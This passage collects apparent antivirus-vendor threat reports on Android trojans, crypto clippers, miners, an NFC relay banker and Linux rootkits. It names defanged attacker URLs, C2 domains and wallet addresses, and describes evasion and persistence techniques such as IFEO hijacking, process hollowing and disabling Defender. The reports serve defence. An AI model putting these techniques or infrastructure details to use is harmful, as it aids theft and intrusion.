Alpine Quest is topographic software that allows different maps to be used both in online and offline mode. It is popular among athletes, travelers, and hunters but also widely used by Russian military personnel in the Special Military Operation zone—and this is what the malware campaign organizers decided to exploit. Threat actors embedded Android.Spy.1292.origin into one of the older Alpine Quest app versions and distributed the trojanized variant under the guise of a freely available version of Alpine Quest Pro, a program with advanced functionality. They created a fake Telegram channel for the software; the channel provided a link for downloading the app in one of the Russian app catalogs. The same trojan version, disguised as the app’s “update”, was later distributed via this very same channel.

The Telegram channel through which threat actors distributed the Android.Spy.1292.origin trojan

Because Android.Spy.1292.origin is embedded into a copy of the genuine app, it looks and operates as the original, which allows it to stay undetected and execute malicious tasks for longer periods of time.

Each time it is launched, the trojan collects and sends the following data to the C&C server:

the user’s mobile phone number and their accounts;
contacts from the phonebook;
the current date;
the current geolocation;
information about the files stored on the device;
the app’s version.

At the same time, it duplicates some of this information in the attackers’ Telegram bot. For instance, the trojan sends it the geolocation data every time the device’s location changes.

After receiving information about the available files, threat actors can command the trojan to download and run additional modules that are to be used to steal the necessary files. The analysis performed by our specialists indicates that the creators of the trojan are particularly interested in confidential documents that users sent via the Telegram and WhatsApp messengers as well as the locLog location log file created directly by the Alpine Quest program.

As a result, Android.Spy.1292.origin not only allows user locations to be monitored but also confidential files to be hijacked. In addition, its functionality can be expanded via the download of new modules, which allows it to then execute a wider spectrum of malicious tasks.

Doctor Web’s specialists recommend installing Android programs only from reputable sources, such as official app catalogs, and opting against downloading software from Telegram channels and dubious websites, especially when it comes to supposedly freely available paid versions of programs. At the same time, it is important to pay attention to who is distributing the apps of interest, as attackers often disguise themselves as real developers, using similar names and logos.

To protect Android devices, it is essential to use an anti-virus. Dr.Web Security Space for mobile devices reliably detects and deletes the Android.Spy.1292.origin trojan, keeping our users well protected from this threat.

Indicators of compromise

More details about Android.Spy.1292.origin

Nice chatting with you: what connects cheap Android smartphones, WhatsApp and cryptocurrency theft?

Mon, 14 Apr 2025 02:00:00 GMT

April 14, 2025

Every year, cryptocurrencies become more and more common as a payment method. According to the data for 2023, in developed countries about 20% of the population has at some time used such a means of payment, and in developing countries, where the banking sector does not meet the needs of the population, the number of cryptocurrency users is even higher. In cryptocurrency adoption rankings, Russia is among the top ten countries in terms of number of users. Anonymity, fast transactions, global accessibility and low transfer fees are the main advantages that attract ordinary users. Fraudsters, on the other hand, appreciate the irreversibility of the transactions, the lack of regulation, and the lack of user knowledge due to the relative novelty of the technology, which allows them to implement a variety of illicit enrichment schemes.

Starting from June 2024, the Doctor Web virus laboratory has received a number of reports from our customers who installed Dr.Web Security Space antivirus on their newly purchased Android phones. A scan of the system partition revealed a suspicious application disguised as WhatsApp messenger. During their investigation, our analysts were able to establish that those cases were not a mere blip on the radar. It turned out that they were all part of a campaign to steal cryptocurrency through clipping.

Clipping means stealing information by intercepting and/or spoofing data that a user copies to the clipboard. Most commonly, clippers are designed to search the clipboard for strings corresponding to cryptocurrency wallet addresses. On average, such strings contain between 25 and 42 characters. And to avoid any hassle, users typically use standard "copy" and "paste" operations to work with such data. A clipper can take advantage of this by intercepting the contents of the clipboard and discreetly replacing all cryptocurrency wallet addresses with those of the cybercriminals.

Using messengers trojanized by clippers to steal financial information is not a new tactic for hackers: one such campaign began in 2023. At that time, a group of attackers used a number of legitimate platforms, such as YouTube, to distribute links to malicious Telegram and WhatsApp apps. These links were placed in the video descriptions. The main target audience was Chinese users, who do not have access to foreign messengers. And since they have to use a number of tricks to get around the geoblocking, usually by downloading programs from third-party sites, this campaign was quite successful.

Now the attackers moved to the next level, gaining access to the supply chain of a number of Chinese manufacturers of Android-based smartphones. These are the smartphones that have been reported to Doctor Web's virus lab. Fraudulent applications were detected directly in the software pre-installed on the phone. In this case, the malicious code was added to the WhatsApp messenger.

It should be noted that in most cases the compromised devices were low-end and had names similar to the models of well-known brands: S23 Ultra, Note 13 Pro, P70 Ultra, and so on. At the same time, their actual technical specifications were far from what their product page claimed. The threat actors used an application that allowed them to easily spoof all of the technical information displayed not only on the About Device page but also in the reports of such popular applications as AIDA64 and CPU-Z. In addition, although the About Device page claimed that the phones have the latest version of Android 14 installed on them, all of the devices were actually running the same build of Android 12. A third of the models listed below are manufactured under the SHOWJI brand. Unfortunately, we were unable to identify the manufacturer of the remaining models.

SHOWJI S19 Pro	Note 30i	Camon 20
SHOWJI Note 13 Pro	S23 Ultra	P70 Ultra
SHOWJI X100S Pro	S18 Pro	M14 Ultra
SHOWJI Reno12 Pro	6 Pro	S24 Ultra

Smartphone models purchased by our users that came with preinstalled malicious software

Product descriptions in bad Russian boasting “Fast Tastydragon CPU” [sic!] and “50 million cameras” [even sic’er!]

Screenshot of the application used to spoof technical specifications of the device and the result of its operation

To verify device specifications with greater certainty, you can use an app called DevCheck. In most cases, this application accurately determines the product specifications, even if the manufacturer is trying to mislead the consumer.

To create their trojanized WhatsApp application, the threat actors used the LSPatch tool. This framework allows the behavior of the main application to be modified, without altering its code, and additional software modules to be loaded. In this case, the criminals placed the malicious module com.whatsHook.apk in the assets folder, which performs the following functions:

application update hijacking. Now, instead of checking for updates at hxxps://www.whatsapp[.]com/android/current/WhatsApp[.]apk, the application accesses one of the attackers' servers, e.g., hххps://apk-download[.]pro/download/whatsapp[.]apk. This keeps the application trojanized and allows it to make the changes the threat actors need;

Method that hijacks requests to the legitimate update server

Class that swaps the legitimate update address with the fake one

searches for strings in received and sent messages that match the wallet address patterns for the Tron (34-character string starting with T) and Ethereum (42-character string starting with 0x) cryptocurrencies and replaces them with the attackers' addresses. The cybercriminals expanded the basic clipper functionality, and now the victim does not even suspect that something is wrong. In the case of an outgoing message, the compromised device displays the correct address of the victim's own wallet, while the recipient of the message is shown the address of the fraudsters' wallet. And when an incoming message is received, the sender sees the address of their own wallet; meanwhile, on the victim's device, the incoming address is replaced with the address of the hackers' wallet. The scammers change wallet addresses with each iteration of the campaign, but the trojan also contains backup addresses ("TN7pfenJ1ePpjoPFaeu46pxjT9rhYDqW66", "0x673dB7Ed16A13Aa137d39401a085892D5e1f0fCA") that can be used if for some reason communication cannot be established with the C2 server. In addition, the trojan sends all messages from all WhatsApp chats to the attacker's server;

Parser that searches for strings matching Tron wallet addresses

Parser that searches for strings matching Ethereum wallet addresses

searches for all .jpg, .png, and .jpeg images in the following folders and sends them to the attackers’ server

DCIM	DOWNLOADS
PICTURES	DOCUMENTS
ALARMS	SCREENSHOTS

This is done to find the so-called mnemonic (recovery) phrase for crypto wallets, which is a set of 12-24 words in a specific order. Such a phrase is displayed once when a wallet is created, and many users simply take a screenshot of it instead of writing it down or saving it to a separate medium. For legitimate purposes, such phrases allow the wallet to be accessed if the user forgets the password. For attackers, obtaining such data means the ability to instantly withdraw all the money from the cryptocurrency wallet.

An example of a mnemonic phrase for recovering access to a cryptocurrency wallet. The user must enter these words in numerical order.

sends information about the device: the device manufacturer, model, language settings, and the name of the trojanized application. In total, the scammers modified about 40 different applications. These include the aforementioned WhatsApp and Telegram, as well as other messengers, QR code scanners, etc. But, most important, it was popular cryptocurrency wallet applications (MathWallet, Trust Wallet, and others) that were affected.

This trojan has been given the unique name Shibai in the Doctor Web virus database due to the string Log.e("", "-------------------SHIBAI-释放------------") contained in its code. We assume that this is a reference to the name of another crypto coin.

Unfortunately, this campaign has gained a great deal of momentum. The hackers employ more than 60 C2 servers to manage it and approximately 30 domains to distribute malicious applications. We were also able to obtain information about the financial gains made by the trojan’s creators. One of the wallets has received more than a million dollars over the last two years. Overall assets in another wallet amounted to half a million dollars. The rest of the wallets (about 20 of them) held amounts up to $100,000. It is impossible to get a complete picture of the profitability of this campaign, as the wallet addresses are obtained from the server of the attackers, and they may be different from time to time.

One of the crypto wallets with the most assets

To protect yourself from such attacks, our virus analysts recommend installing Dr.Web Security Space antivirus for mobile devices, shunning smartphones with features that clearly do not match their price, downloading applications only from trusted sources, such as Google Play, RuStore and AppGallery, and not storing on their devices screenshots with mnemonic phrases, passwords, and keys in unencrypted form.

Doctor, where did you get these pictures? Using steganography in a cryptocurrency mining campaign.

Fri, 24 Jan 2025 07:00:00 GMT

January 24, 2025

When analyzing telemetry data, virus analysts at Doctor Web identified malware samples that, upon closer examination, turned out to be components of an active campaign to mine the Monero cryptocurrency. This campaign is notable because it is implemented as a series of malware chains, two of which are based on executing scripts that extract malicious payloads from BMP image files.

The campaign likely began in 2022 when our analysts first observed Services.exe, a .NET application that launched a malicious VBscript. This script implements backdoor functionality by contacting the attacker's server and executing the scripts and files sent in response. For example, the malicious file ubr.txt, a PowerShell script whose extension was changed from ps1 to txt, was downloaded to the victim's computer.

The ubr.txt script checks for miners that may already be installed on the compromised machine and replaces them with the versions the attackers provide. The files installed by the script are the SilentCryptoMiner miner and its configuration, which the hackers used to mine the Monero cryptocurrency.

We have reported on the use of this miner by attackers who are attracted by its ease of configuration, its advanced capabilities for mining different types of cryptocurrencies and hiding from diagnostic utilities, and its ability to remotely manage all of the miners in the botnet via a web panel.

As part of this campaign, the miner files are disguised as components of various software, such as the Zoom video conferencing application (ZoomE.exe and ZoomX.exe), Windows services (Service32.exe and Service64.exe), etc. Although there exist several sets of malicious modules with different names, they all perform the same tasks: removing other miners, installing a new miner, and delivering updates for it.

PowerShell script ubr.txt

In addition, the miner accesses the getcert[.]net domain, which hosts the m.txt file containing the cryptocurrency mining settings. This domain is also used in other infection chains.

The miner configuration included in the m.txt file

Later, fraudsters modified the attack methodology, making it much more interesting and incorporating steganography tools.

Steganography is a method of hiding information within other information. Unlike cryptography, which can draw attention to encrypted data, steganography allows information to be hidden inconspicuously, such as in an image. Many cybersecurity experts believe that the use of steganography to bypass defenses will grow in popularity.

The image on the left (credit: Marek Piwnicki) contains a hidden image with the Dr.Web logo

The second, more recent chain employs the Amadey trojan, which runs the PowerShell script Async.ps1. The script downloads BMP images from the legitimate image-hosting site imghippo.com. A steganographic algorithm extracts two executables from the images: the Trojan.PackedNET.2429 stealer and a payload that does the following:

Disables the UAC prompt for administrators
Makes numerous exceptions to the built-in Windows Defender antivirus
Disables notifications in Windows
Creates a new task in \Microsoft\Windows\WindowsBackup\ with the name 'User'.

Contents of the Async1.ps script

During its execution, the task accesses the attackers' domains whose DNS TXT record contains the address of the payload. After downloading it, the archive containing BMP images is unpacked and the following files are launched:

Cleaner.txt, a PowerShell script that removes all other miners,
m.txt, a PowerShell script that extracts payloads from m.Bmp and IV.Bmp images. The payload inside the images is SilentCryptoMiner and the injector that runs it,
Net.txt, a script that reads a DNS TXT record from the domains windowscdn[.]site and buyclients[.]xyz. This record contains a payload link pointing to raw.githack[.]com.

A DNS TXT record is an extension of the standard DNS record and contains data that helps to verify a domain. However, the domain owner can include any data in it, such as, in this case, a payload link.

Contents of the archive with malicious images

The miner modules are constantly evolving. Recently, the authors switched to using legitimate resources to host malicious images and the GitHub platform to store payloads. Additionally, we have observed modules that verify whether this malware is running in sandboxes and virtual machines.

A module that checks the names of running applications against the names of common tools used by cybersecurity researchers

One of the wallets found in the miner's configuration was created in May 2022, and so far, it has received 340 XMR. However, the exchange rate of this cryptocurrency is experiencing a period of significant volatility, so in this case the fraudsters' profit could be 65–70 thousand USD. Judging by the wave-like shape of the hash rate curve, which indicates that the computers in the botnet are turned on and off regularly, this mining campaign mostly involves ordinary users located in the same group of time zones. On average, the hash rate is 3.3 million hashes per second, which allows compromised machines to earn the attackers 1 XMR every 40 hours or so.

This campaign is just the tip of the iceberg in the world of steganography-based cyber threats and underscores the importance of being vigilant in the digital space. Doctor Web's recommendations remain unchanged: only install software from reliable sources, do not click on suspicious links, and do not disable antivirus protection when downloading files from the Internet.

Attack chain

Indicators of compromise

Contactless banking for thee (and for thief): NFC money theft scheme reaches Russian users

Thu, 26 Dec 2024 02:00:00 GMT

December 26, 2024

Malware analysts at “Doctor Web” warn about the emergence of new versions of the NGate banking trojan, targeting users in Russia. This trojan relays data from the NFC chip of the compromised device, allowing the attacker to withdraw money from the victim's accounts at ATMs without any victim’s involvement.

The NGate banker first appeared on the radar of antivirus vendors in the autumn of 2023, when reports of attacks on customers of major Czech banks began to appear in specialized media. The attackers' strategy involved a combination of social engineering, phishing and the use of malware. When used together, these standard tactics created a rather innovative scenario: after interacting with the victim, the hackers gained remote access to the NFC capabilities of their payment method. Law enforcement in the Czech Republic was able to stop this campaign, but its concept was adapted to the Russian context and used there for illegal enrichment.

The event that initiates the chain of attack is likely to be a phone call from fraudsters claiming that the victim is eligible for a social benefit or other financial gain. To receive it, the victim must tap on the link, which leads to a fraudulent website, that hosts a malicious APK containing the NGate trojan. The APK is disguised as an application for the Gosuslugi (government services) portal, the Bank of Russia or one of the other popular banks.

Icons of fake applications, made to look like their official counterparts

The NGate banking trojan is a malicious modification of the open source NFCGate application, which was developed to debug NFC data transfer protocols. NFCGate supports a number of functions, but of most interest to attackers is the ability to capture NFC traffic and send it to a remote device, which could be either an intermediary server or the attacker's own smartphone. The criminals have modified the source code by adding user interfaces similar to the official applications and enabling the NFC data relay mode. In addition, the application includes the nfc-card-reader library, which allows the hackers to remotely obtain the card number and its expiry date.

After launching the application, the victim is prompted to place their payment card on the back of the smartphone, enter the PIN and wait for the fake application to verify the card. At this point, all the data on the card is read and transferred to the criminals. Note that the compromised smartphone does not need to be rooted to expose its NFC data.

Screens that ask the victim to place their bank card on the back of their smartphone.

While the victim holds their card close to their smartphone, the attacker is already at the ATM requesting a cash withdrawal. Another option is to use this scheme for contactless payments. When the ATM asks for the bank card, the hacker simply taps their phone, which will transmit the digital thumbprint of the victim's bank card. The transaction is confirmed using the PIN code the victim previously submitted.

To prevent money theft, the analysts at “Doctor Web” have the following recommendations:

do not share your PIN or CVV codes for your bank cards,
use an antivirus program, it will block downloading and installation of malicious applications,
carefully check the addresses of web pages that ask for financial information,
only install applications from official sources such as AppGallery and Google Play,
do not talk to scammers. If you receive an unexpected call from the police, a bank or any other organization, simply hang up. If you have any doubts about the legitimacy of the call, find the contact details on the official website and contact the organization yourself.

More about Android.Banker.NGate.1

Indicators of compromise

Malware trends: eBPF exploitation, malware configurations stored in unexpected places, and increased use of custom post-exploitation tools

Tue, 10 Dec 2024 11:09:06 GMT

December 10, 2024

An investigation into an information security incident has allowed virus analysts at Doctor Web to uncover an ongoing campaign that incorporates many modern trends employed by cybercriminals.

A client approached Doctor Web after suspecting that their computer infrastructure had been compromised. While analyzing the client’s data, our virus analysts identified a number of similar cases, leading them to conclude that an active campaign was underway. It appears that the hackers' efforts are primarily concentrated in Southeast Asia. During the attacks, they utilize a comprehensive suite of malware that is deployed at various stages. Unfortunately, it was impossible for our analysts to determine how initial access to the compromised machines was obtained. However, they were able to reconstruct the rest of the attack chain. Notably, the threat actors managed to maliciously exploit eBPF (extended Berkeley Packet Filter) technology.

eBPF technology was developed to enhance control over the network subsystem of the Linux operating system and its processes. It has demonstrated significant potential, attracting the attention of major IT companies: almost from the moment of its inception, giants like Google, Huawei, Intel, and Netflix joined the eBPF Foundation to participate in its further development. Unfortunately, hackers have also taken an interest in eBPF.

By providing extensive low-level capabilities, eBPF can be used by malicious actors to conceal network activity and processes, gather confidential information, and bypass firewalls and intrusion detection systems. The amount of effort needed to detect such malware allows hackers to use it in APT (advanced persistence threat) attacks and to mask their presence for extended periods.

These are the capabilities that the attackers decided to exploit by loading two rootkits onto the compromised machine. The first was an eBPF rootkit that concealed the operation of another rootkit, implemented as a kernel module, which in turn prepared the system for the installation of a remote access trojan. A notable feature of the trojan is its support for various traffic-tunneling technologies that allow it to communicate with the attackers from private network segments and conceal the transmission of commands.

Overall, since 2023, the use of malicious eBPF software has been gaining momentum. This is evidenced by the emergence of several families of malware based on this technology, including Boopkit, BPFDoor, and Symbiote. New vulnerabilities, routinely found in this technology, only exacerbate the situation. As of now, 217 BPF vulnerabilities are known to exist, with about 100 of them discovered in 2024.

Another notable feature of the campaign is the rather creative approach taken by the threat actors with regards to storing the trojan's settings. Previously, they were likely to use dedicated servers for such purposes, but now instances where the malware configurations are being stored openly on public platforms are increasing. For example, the malware in question accessed platforms like GitHub and even a Chinese blog on information security. This helps draw less attention to the traffic coming from the compromised machine, as to an unsuspecting observer, the machine appears to be interacting with a safe network host. This negates the need to ensure access to a control server where settings are stored. Overall, the idea of leveraging publicly available services as a control infrastructure is not new; hackers are known to have previously used Dropbox, Google Drive, OneDrive, and even Discord for this purpose. However, regional restrictions on these services in several countries, particularly in China, make them less attractive in terms of ensuring availability. Meanwhile, access to GitHub remains available to most providers, making it preferred in the eyes of hackers.

Settings stored on GitLab and in a security blog. Curiously, in the latter case, the hacker asks for help decrypting third-party code. The code will later be sent to the trojan as an argument for one of the commands.

Another feature of this campaign is that the trojan is starting to be adapted for later use as a component for a post-exploitation framework, which is a suite of software used after a computer has been accessed. Such frameworks are not inherently illegal; they are used by companies that officially provide security-audit services. The most popular tools are Cobalt Strike and Metasploit, which allow a large number of checks to be automated and have a built-in vulnerability database.

An example of a network map created by Cobalt Strike (source: official website)

Of course, such capabilities are highly sought after by threat actors. In 2022, a cracked version of Cobalt Strike became available to a wide audience, leading to a surge in hacker activity. Geographically, the Cobalt Strike infrastructure has a significant presence in China. It is worth noting that the developer aims to track all Cobalt Strike installations, and servers with cracked versions are routinely shut down by law enforcement. Therefore, hackers are steadily trending towards using open-source frameworks that support extensions out of the box and are able to modify the network communication between the infected host and its control server. They prefer this strategy as it does not draw additional attention to their infrastructure.

As a result of the investigation, our analysts added all identified threats to our malware databases and incorporated additional heuristic rules to ensure that malicious eBPF programs are recognized.

More about Trojan.Siggen28.58279

Indicators of compromise

Malicious apps on Google Play: how threat actors use the DNS protocol to covertly connect trojans to C&C servers

Mon, 11 Nov 2024 13:44:17 GMT

November 11, 2024

Many Android.FakeApp trojans are tasked with opening links to various sites, and from a technical point of view, such malware programs are quite primitive. When launched, they receive a command to load a specific web address. As a result, the users who have installed them see the contents of some unwanted site on their screens instead of the program or game they are expecting. However, sometimes notable samples can emerge among such fake applications: Android.FakeApp.1669, for example. It differs from most of the threats that are similar to it in that it uses a modified dnsjava library to get the configuration from a malicious DNS server that contains the target link. At the same time, such a configuration is sent to the trojan only when it is connected to the Internet via certain service providers—mobile Internet providers, for example. In other cases, the trojan does not manifest itself in any way.

Android.FakeApp.1669 is represented by a large number of modifications that are disguised as various programs on distribution sources that include Google Play. For instance, the currently known trojan variants have been downloaded from the official Android OS digital store at least 2,160,000 times.

Examples of the programs in which Android.FakeApp.1669 was hidden

Below is the list of the Android.FakeApp.1669 variants that Doctor Web’s malware analysts discovered on Google Play. Our experts detected more trojans, but some of them are no longer in this app store.

App name	Number of downloads
Split it: Checks and Tips	1,000,000+
FlashPage parser	500,000+
BeYummy - your cookbook	100,000+
Memogen	100,000+
Display Moving Message	100,000+
WordCount	100,000+
Goal Achievement Planner	100,000+
DualText Compare	100,000+
Travel Memo	100,000+ (is deleted)
DessertDreams Recipes	50,000+
Score Time	10,000+

When launched, Android.FakeApp.1669 sends a DNS request to its C&C server to receive the TXT record associated with the name of a target domain. In turn, the server gives this record to the trojan only if the infected device is connected to the Internet via target providers, which include mobile Internet providers. Such TXT records usually contain domain data and some additional technical information, but in the case of Android.FakeApp.1669, the malware’s configuration is encoded into it.

Android.FakeApp.1669 uses modified code of the dnsjava Open Source library to send DNS requests.

All trojan modifications are tied to specific domain names, which allows the DNS server to send each of them their own configuration. Moreover, the sub-domain names of these target domains are unique to each infected device. They contain encoded data about the device, including sensitive information:

device model and brand;
screen size;
ID (it consists of two numbers: the first is the malware’s installation time, and the second is a random number);
whether the device’s battery is charging and its current charge percentage;
whether the developer settings are enabled.

For example, when analyzed, the Android.FakeApp.1669 variant hidden in the Goal Achievement Planner program requested the server to send it the TXT record for the domain 3gEBkayjVYcMiztlrcJXHFSABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]simpalm[.]com.; the variant from the Split it: Checks and Tips program requested the record for the domain 3gEBkayjVYcMiztlrcJXHFTABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]revolt[.]digital., and the variant from the DessertDreams Recipes app requested the record for the domain 3gEBkayjVYcMiztlrcJXHFWABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]outorigin[.]com..

An example of a target domain’s TXT record, which was sent by the DNS server upon request via the Linux ‘dig’ tool when one of the Android.FakeApp.1669 modifications was undergoing analysis

The contents of these TXT records can be decrypted by doing the following:

reversing the string;
decoding the Base64 data;
decompressing the gzip data;
splitting it into lines by the character ÷.

The resulting data will look like this (the example below relates to the TXT record for the Goal Achievement Planner app):

url
hxxps[:]//goalachievplan[.]pro
af_id
DF3DgrCPUNxkkx7eiStQ6E
os_id
f109ec36-c6a8-481c-a8ff-3ac6b6131954

This data contains the link that the trojan loads in WebView inside its window over its main interface. This link leads to the website that starts a long chain of redirects, at the end of which is an online casino site. As a result, Android.FakeApp.1669 literally transforms into a web application that displays the contents of the loaded website and not the functionality declared on the app’s page on Google Play.

Instead of providing the expected functionality, the malicious program displayed the contents of a loaded online casino website

At the same time, when the trojan has Internet access via non-targeted service providers (and also when offline), it operates as the advertized program—on condition that the creators of a particular malware modification provided some functionality for such a case.

The trojan did not receive a configuration from the C&C server and launched as a normal app

Dr.Web Security Space for mobile devices successfully detects and deletes all known Android.FakeApp.1669 modifications, so this trojan does not pose a threat to our users.

Indicators of compromise

More details on Android.FakeApp.1669

Hidden cryptocurrency mining and theft campaign affected over 28,000 users

Tue, 08 Oct 2024 14:47:30 GMT

October 8, 2024

Virus analysts at Doctor Web have identified a large-scale campaign aimed at spreading cryptomining and cryptostealing malware by delivering trojans to victims' computers under the guise of office programs, game cheats, and online trading bots.

During routine analysis of cloud telemetry submitted by our users, specialists at the Doctor Web virus lab detected suspicious activity of a program disguised as a Windows component (StartMenuExperienceHost.exe, a legitimate process with this name is responsible for managing the Start menu). This program communicated with a remote network host and waited for an incoming connection to immediately launch the cmd.exe command line interpreter.

Disguised as a system component was the Ncat network utility, which, when used for legitimate purposes, transfers data over the network via the command line. This discovery helped reconstruct a sequence of security events, including attempts to infect computers with malware, which were prevented by Dr.Web.

The source of infection is fraudulent pages created by attackers on GitHub (note that such activity is prohibited by the platform's rules) or Youtube pages containing malware links in the description below the video. By clicking on the link, the victim downloads a self-extracting, password-protected archive. Because the archive is encrypted, it cannot be automatically scanned by antivirus software. After entering the password provided by the hackers on the download page, the following temporary files are extracted to the %ALLUSERSPROFILE%\jedist folder on the victim's computer:

UnRar.exe - an application for extracting RAR archives;
WaR.rar - a RAR archive;
Iun.bat - a script that creates a task to run the Uun.bat script, then initiates a computer restart, and deletes itself;
Uun.bat - an obfuscated script that extracts WaR.rar, runs the ShellExt.dll and UTShellExt.dll files it contains, and then deletes the task created by Iun.bat and the jedist folder along with its contents.

The ShellExt.dll file is an AutoIt language interpreter and is not malicious in and of itself. However, this is not its true name. Attackers have renamed it from AutoIt3.exe to ShellExt.dll to disguise it as a WinRAR library that is responsible for integrating archiver functionality to the Windows right-click menu. Once launched, the interpreter in turn loads the UTShellExt.dll file, which the cybercriminals borrowed from the Uninstall Tool utility. Perfectly legitimate in its own right, it even carries a valid digital signature, but it has a malicious AutoIt script attached to it. Once executed, the script unpacks its payload, which consists of a series of heavily obfuscated files.

AutoIt is a programming language for creating automation scripts and utilities for Windows. Its ease of use and broad functionality have made it popular with various categories of users, including malware writers. Some antivirus programs detect all compiled AutoIt scripts as malicious.

The UTShellExt.dll file performs the following actions:

Scans the process list for running debugging software. The script contains the names of about 50 different debugging utilities, and if at least one process from this list is detected, the script will terminate
If no debugging software is found, the files needed to continue the attack are extracted on the compromised system. Some of the files are “clean”, they are necessary to implement network communication, while the rest perform malicious actions
Creates system events to gain network access using Ncat and execute BAT and DLL files, and modifies the registry to gain persistence using the IFEO technique
Image File Execution Options (IFEO) is a feature that Windows makes available to software developers. For example, it allows them to automatically launch a debugger when an application starts. However, attackers can use the IFEO technique to gain a foothold in the system. They accomplish this by swapping the path to the debugger with the path to the malicious file, so that every time a legitimate application is launched, the malicious application is started as well. In this case, the hackers "hijacked" Windows system services, as well as the Google Chrome and Microsoft Edge update processes (MoUsoCoreWorker.exe, svchost.exe, TrustedInstaller.exe, GoogleUpdate.exe and MicrosoftEdgeUpdate.exe).
Revokes the delete and modify permissions for the folders and files created in step 2.
Disables the Windows Recovery Service
Sends the specifications of the compromised computer, its name, operating system version and information about the installed antivirus software to the attackers using a Telegram bot.

The DeviceId.dll and 7zxa.dll files perform hidden cryptomining and cryptostealing functions, respectively. Both files inject their payload into the explorer.exe (Windows Explorer) process using the Process Hollowing technique. The first file is a legitimate library distributed as part of the .NET framework that has a malicious AutoIt script embedded that executes the SilentCryptoMiner miner. This miner has extensive configuration and stealth capabilities for cryptocurrency mining, as well as remote control functionality.

The 7zxa.dll library, which again is a legitimate library of the 7-Zip archiver, contains a clipper. This type of malware is used to monitor data in the clipboard, which it can either spoof or pass on to attackers. In this case, the clipper waits for typical strings in the clipboard that are characteristic of wallet addresses and replaces them with those specified by the attackers. At the time of publication, it is confirmed that only thanks to the clipper hackers were able to get hold of more than 6000 dollars worth of cryptocurrency.

The Process Hollowing technique consists of running a trusted process in a suspended state, overwriting its code in memory with malicious code, and then resuming the process execution. The use of this technique results in the presence of copies of the process with the same name, so in our case three explorer.exe processes were observed on the victims' machines, which is suspicious in itself as this process normally exists as a single copy.

In total, this malware campaign has affected more than 28,000 people, the vast majority of whom are residents of Russia. Significant numbers of infections have also been observed in Belarus, Uzbekistan, Kazakhstan, Ukraine, Kyrgyzstan and Turkey. Since the victims' computers were compromised by installing pirated versions of popular programs, the main recommendations to prevent such incidents include downloading software from official sources, using their open source replacements, and installing capable antivirus software. Users of Dr.Web products are not affected by this threat.

Redis honeypot: server with vulnerable Redis database reveals new SkidMap modification used to hide cryptocurrency mining process

Thu, 03 Oct 2024 03:00:00 GMT

October 3, 2024

Doctor Web virus analysts have identified a new rootkit modification that installs the Skidmap mining trojan on compromised Linux machines. This rootkit is designed as a malicious kernel module that hides the miner’s activity by providing fake information about CPU usage and network activity. This attack appears to be indiscriminate, primarily targeting the enterprise sector—large servers and cloud environments—where mining efficiency can be maximized.

The Redis database management system is the world’s most popular NoSQL database: Redis servers are used by large companies such as X (formerly Twitter), Airbnb, Amazon and others. Its advantages are obvious: maximum performance, tiny memory footprint, and support for various data types and programming languages. However, this product also has some downsides: since Redis was never intended to be used at the network’s edge, it only supports basic security features in its default configuration, and no access control and encryption mechanisms exist prior to version 6. In addition, cybersecurity publications report numerous Redis vulnerabilities each year. In 2023, for example, there were 12 vulnerabilities, three of which had a “Serious” status. The growing number of reports of compromised servers and the subsequent installation of mining programs sparked the interest of Doctor Web's virus lab staff, who wanted to experience the attack firsthand. For this purpose, they decided to set up their own unprotected Redis server and wait for uninvited guests. The server was active for a year, and during that time it was attacked about 10–14 thousand times a month. Recently, the server was hit with a modification of the SkidMap trojan, as our analysts expected. What came as a surprise, however, was that the cybercriminals used a new method to hide the miner's activity and installed four backdoors at the same time.

The Skidmap trojan first made headlines in 2019. This trojan-miner is specialized and mainly targets enterprise networks since the greatest stealth mining profits can be achieved in the corporate segment. Despite the fact that five years have passed since the trojan’s debut, the principle of its operation remains unchanged: the trojan is installed on a system by exploiting vulnerabilities or through misconfigured software. In the case of our honeypot server, the hackers added tasks to the system scheduler in which a script downloaded the Linux.MulDrop.142 dropper (or its other modification, Linux.MulDrop.143) every 10 minutes. This executable checks the OS kernel version, disables the SELinux security module, and then unpacks the Linux.Rootkit.400 rootkit, the Linux.BtcMine.815 miner, and the Linux.BackDoor.Pam.8/9 and Linux.BackDoor.SSH.425/426 backdoors on the system. The dropper is remarkable in that it is quite large, as it packs about 60 executables for various Linux distributions. In this case, the dropper contained the files for various versions of Debian and Red Hat Enterprise Linux distributions, which are most commonly encountered on servers.

Once installed, the rootkit intercepts a number of system calls, allowing it to generate fake information in response to diagnostic commands entered by an administrator. Intercepted functions include those that report average CPU usage, network activity on a number of ports, and lists of files in directories. The rootkit also checks all kernel modules when they are loaded and prevents those that can detect its presence from running. All this allows it to thoroughly hide all aspects of the miner's cryptocurrency mining activity: computation, sending hashes, and receiving jobs.

The purpose of the four backdoors installed by the dropper as part of this attack is to collect SSH credentials from a compromised machine and send them to the attackers and to create a master password for all accounts on the system. Note that all passwords are additionally encrypted using the Caesar cipher with a 4-letter offset.

To increase their ability to control a compromised system, the attackers install the Linux.BackDoor.RCTL.2 remote access trojan. It allows commands to be sent to the infected machine and data to be exfiltrated via the encrypted connection that the trojan itself initiates, thus bypassing the routing problem.

The xmrig program is installed as a miner that can mine a number of cryptocurrencies, the most famous of which is Monero, which has gained popularity on the darknet due to its complete anonymity at the transaction level. It should be said that detecting a rootkit-covered miner in a cluster of servers is no trivial task. If the diagnostic data are spoofed, the only thing that might indicate a compromise is excessive power consumption and increased heat generation. However, to somewhat mitigate that, attackers can also tweak the miner's settings to find an optimal balance between mining performance and preserving hardware performance, thus drawing less attention to a compromised system.

The evolution of the Skidmap malware family can be seen in the increasing complexity of the attack chain: the launched programs call each other, disable security systems, interfere with a large number of system utilities and services, download rootkits, etc., which makes it much more difficult to respond to such incidents.

Indicators of compromise

Doctor Web resumed virus database updates after the attack on its infrastructure

Wed, 18 Sep 2024 15:49:02 GMT

September 18, 2024

Now that the dangerous situation involving the attack on Doctor Web's infrastructure has been resolved successfully, we're happy to bring you up to speed on the latest developments and present the security incident's complete timeline.

The attack on our infrastructure began on Saturday, September 14, 2024.

We were monitoring it closely and maintained control over the situation.

On September 16, 2024, Doctor Web’s information security team detected signs of unauthorised interference with our IT infrastructure.

Following established security policies, we disconnected all our servers from the network and initiated comprehensive security diagnostics. To analyse and eliminate the incident's consequences, we implemented a series of measures, including the use of Dr.Web FixIt! for Linux. The gathered data allowed our security experts to successfully isolate the threat and ensure that our customers remained unaffected by it.

